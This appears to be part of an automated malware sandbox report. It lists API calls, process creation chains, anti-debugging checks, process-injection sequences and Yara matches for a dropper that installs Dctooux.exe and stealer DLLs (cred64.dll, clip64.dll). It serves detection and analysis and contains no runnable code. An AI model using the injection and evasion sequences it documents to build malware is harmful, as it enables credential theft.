Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_02DA2E9B push dword ptr fs:[00000030h] 4_2_02DA2E9B
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048D0D90 mov eax, dword ptr fs:[00000030h] 4_2_048D0D90
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0490D809 mov eax, dword ptr fs:[00000030h] 4_2_0490D809
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048D092B mov eax, dword ptr fs:[00000030h] 4_2_048D092B
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_04909AA2 mov eax, dword ptr fs:[00000030h] 4_2_04909AA2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0043D5A2 mov eax, dword ptr fs:[00000030h] 24_2_0043D5A2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0043983B mov eax, dword ptr fs:[00000030h] 24_2_0043983B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_02EF304B push dword ptr fs:[00000030h] 24_2_02EF304B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048C0D90 mov eax, dword ptr fs:[00000030h] 24_2_048C0D90
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048FD809 mov eax, dword ptr fs:[00000030h] 24_2_048FD809
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048C092B mov eax, dword ptr fs:[00000030h] 24_2_048C092B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048F9AA2 mov eax, dword ptr fs:[00000030h] 24_2_048F9AA2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0043D5A2 mov eax, dword ptr fs:[00000030h] 36_2_0043D5A2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0043983B mov eax, dword ptr fs:[00000030h] 36_2_0043983B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_02E34603 push dword ptr fs:[00000030h] 36_2_02E34603
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04910D90 mov eax, dword ptr fs:[00000030h] 36_2_04910D90
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0494D809 mov eax, dword ptr fs:[00000030h] 36_2_0494D809
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0491092B mov eax, dword ptr fs:[00000030h] 36_2_0491092B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04949AA2 mov eax, dword ptr fs:[00000030h] 36_2_04949AA2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00442103 GetProcessHeap, 36_2_00442103
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Code function: 0_2_00007FF6A4F11180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm, 0_2_00007FF6A4F11180
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0042102F SetUnhandledExceptionFilter, 4_2_0042102F
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_004204FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_004204FC
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00439DBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00439DBE
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00420ECA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00420ECA
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048F0763 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_048F0763
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0490A025 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_0490A025
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048F1131 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_048F1131
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_004204FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_004204FC
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00439DBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00439DBE
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00420ECA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00420ECA
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048E0763 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_048E0763
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048FA025 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_048FA025
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048E1131 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_048E1131
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_004204FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 36_2_004204FC
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00420ECA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_00420ECA
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0042102F SetUnhandledExceptionFilter, 36_2_0042102F
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00439DBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_00439DBE
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04930763 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 36_2_04930763
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0494A025 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_0494A025
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04931131 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_04931131

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_004074F0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree, 4_2_004074F0
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Process created: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe "C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe"
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe "C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe"
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_004210B6 cpuid 4_2_004210B6
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0040B385 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize, 4_2_0040B385
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0040B2B0 GetUserNameA, 4_2_0040B2B0
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_004457B7 _free,_free,_free,GetTimeZoneInformation,_free, 4_2_004457B7
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00408180 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 4_2_00408180
Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: Dctooux.exe PID: 2332, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\clip64[1].dll, type: DROPPED
Source: Yara match File source: 24.2.Dctooux.exe.48c0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.Dctooux.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.Dctooux.exe.4910e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.3.Dctooux.exe.4930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fud_new.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.Dctooux.exe.4980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Dctooux.exe.48c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Dctooux.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fud_new.exe.48d0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.3.Dctooux.exe.4930000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fud_new.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.Dctooux.exe.4980000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.Dctooux.exe.4910e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.fud_new.exe.4940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.Dctooux.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fud_new.exe.48d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.fud_new.exe.4940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Dctooux.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.2290385798.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2811339032.0000000004980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2285765794.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2141512541.0000000004940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3368787116.0000000004910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2285295236.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2289959026.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.2241673718.0000000004930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3363608752.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll, type: DROPPED
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00431261 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 4_2_00431261
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00431F58 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 4_2_00431F58
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_049014C8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 4_2_049014C8
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_049021BF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 4_2_049021BF
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00431261 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 24_2_00431261
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00431F58 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 24_2_00431F58
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048F14C8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 24_2_048F14C8
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048F21BF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 24_2_048F21BF
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00402340 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ, 36_2_00402340
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00431261 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 36_2_00431261
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00431F58 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 36_2_00431F58
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_049414C8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 36_2_049414C8
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_049421BF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 36_2_049421BF